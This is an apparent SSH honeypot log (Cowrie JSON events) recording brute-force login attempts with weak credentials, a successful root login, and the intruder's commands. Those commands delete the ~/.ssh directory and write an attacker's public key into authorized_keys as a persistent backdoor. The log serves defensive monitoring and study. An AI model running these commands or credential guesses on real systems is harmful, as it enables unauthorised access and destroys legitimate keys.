{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:44.806695Z","src_ip":"212.227.235.229","session":"b4a7d0b66d4f"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"changeme","message":"login attempt [muhamad/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:25:46.155041Z","src_ip":"212.227.235.229","session":"b4a7d0b66d4f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:47.483356Z","src_ip":"212.227.235.229","session":"b4a7d0b66d4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35650,"dst_ip":"1.2.3.4","dst_port":22,"session":"31a779f8760b","protocol":"ssh","message":"New connection: 212.227.235.229:35650 (1.2.3.4:22) [session: 31a779f8760b]","sensor":"my-vps","timestamp":"2025-09-08T22:25:52.313097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:52.313979Z","src_ip":"212.227.235.229","session":"31a779f8760b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:52.609333Z","src_ip":"212.227.235.229","session":"31a779f8760b"}
{"eventid":"cowrie.login.failed","username":"webuser","password":"webuser.123","message":"login attempt [webuser/webuser.123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:25:53.823521Z","src_ip":"212.227.235.229","session":"31a779f8760b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:55.117199Z","src_ip":"212.227.235.229","session":"31a779f8760b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44114,"dst_ip":"1.2.3.4","dst_port":22,"session":"f100c2587266","protocol":"ssh","message":"New connection: 212.227.235.229:44114 (1.2.3.4:22) [session: f100c2587266]","sensor":"my-vps","timestamp":"2025-09-08T22:25:55.333808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:55.334699Z","src_ip":"212.227.235.229","session":"f100c2587266"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:55.626011Z","src_ip":"212.227.235.229","session":"f100c2587266"}
{"eventid":"cowrie.login.failed","username":"media","password":"123456","message":"login attempt [media/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:25:56.831262Z","src_ip":"212.227.235.229","session":"f100c2587266"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:58.123857Z","src_ip":"212.227.235.229","session":"f100c2587266"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42370,"dst_ip":"1.2.3.4","dst_port":22,"session":"57568cdb685b","protocol":"ssh","message":"New connection: 212.227.235.229:42370 (1.2.3.4:22) [session: 57568cdb685b]","sensor":"my-vps","timestamp":"2025-09-08T22:26:21.144736Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:26:21.145455Z","src_ip":"212.227.235.229","session":"57568cdb685b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:26:21.454296Z","src_ip":"212.227.235.229","session":"57568cdb685b"}
{"eventid":"cowrie.login.failed","username":"developer","password":"!","message":"login attempt [developer/!] failed","sensor":"my-vps","timestamp":"2025-09-08T22:26:22.726395Z","src_ip":"212.227.235.229","session":"57568cdb685b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:26:24.036069Z","src_ip":"212.227.235.229","session":"57568cdb685b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51462,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee0fad7379da","protocol":"ssh","message":"New connection: 212.227.235.229:51462 (1.2.3.4:22) [session: ee0fad7379da]","sensor":"my-vps","timestamp":"2025-09-08T22:26:35.425406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:26:35.426258Z","src_ip":"212.227.235.229","session":"ee0fad7379da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:26:35.677428Z","src_ip":"212.227.235.229","session":"ee0fad7379da"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"12345","message":"login attempt [muhamad/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:26:36.724276Z","src_ip":"212.227.235.229","session":"ee0fad7379da"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:26:37.978270Z","src_ip":"212.227.235.229","session":"ee0fad7379da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57882,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c26338403f3","protocol":"ssh","message":"New connection: 212.227.235.229:57882 (1.2.3.4:22) [session: 2c26338403f3]","sensor":"my-vps","timestamp":"2025-09-08T22:27:01.944277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:27:01.945500Z","src_ip":"212.227.235.229","session":"2c26338403f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:27:02.239082Z","src_ip":"212.227.235.229","session":"2c26338403f3"}
{"eventid":"cowrie.login.failed","username":"access","password":"password123","message":"login attempt [access/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:27:03.485260Z","src_ip":"212.227.235.229","session":"2c26338403f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49106,"dst_ip":"1.2.3.4","dst_port":22,"session":"65df9132d5ef","protocol":"ssh","message":"New connection: 212.227.235.229:49106 (1.2.3.4:22) [session: 65df9132d5ef]","sensor":"my-vps","timestamp":"2025-09-08T22:27:03.787766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:27:03.788902Z","src_ip":"212.227.235.229","session":"65df9132d5ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:27:04.119281Z","src_ip":"212.227.235.229","session":"65df9132d5ef"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:04.780186Z","src_ip":"212.227.235.229","session":"2c26338403f3"}
{"eventid":"cowrie.login.failed","username":"group1","password":"group1","message":"login attempt [group1/group1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:27:05.475478Z","src_ip":"212.227.235.229","session":"65df9132d5ef"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:06.805284Z","src_ip":"212.227.235.229","session":"65df9132d5ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48004,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8162bc33ba1","protocol":"ssh","message":"New connection: 212.227.235.229:48004 (1.2.3.4:22) [session: b8162bc33ba1]","sensor":"my-vps","timestamp":"2025-09-08T22:27:13.368223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:27:13.368928Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:27:13.667166Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.login.success","username":"root","password":"134679","message":"login attempt [root/134679] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:27:14.898178Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48058,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3bc79fe4acd","protocol":"telnet","message":"New connection: 212.227.125.160:48058 (1.2.3.4:23) [session: c3bc79fe4acd]","sensor":"my-vps","timestamp":"2025-09-08T22:27:15.118026Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:27:15.555323Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:27:15.556062Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:27:15.557135Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:15.856600Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:27:16.511082Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:27:16.511738Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:27:16.810733Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:16.811771Z","src_ip":"212.227.235.229","session":"b8162bc33ba1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48010,"dst_ip":"1.2.3.4","dst_port":22,"session":"e19df40d22a0","protocol":"ssh","message":"New connection: 212.227.235.229:48010 (1.2.3.4:22) [session: e19df40d22a0]","sensor":"my-vps","timestamp":"2025-09-08T22:27:17.154955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:27:17.155843Z","src_ip":"212.227.235.229","session":"e19df40d22a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:27:17.483916Z","src_ip":"212.227.235.229","session":"e19df40d22a0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:27:18.835814Z","src_ip":"212.227.235.229","session":"e19df40d22a0"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:27:20.165270Z","src_ip":"212.227.235.229","session":"e19df40d22a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56262,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c6629ecfa8b","protocol":"ssh","message":"New connection: 212.227.235.229:56262 (1.2.3.4:22) [session: 8c6629ecfa8b]","sensor":"my-vps","timestamp":"2025-09-08T22:27:20.438102Z"}
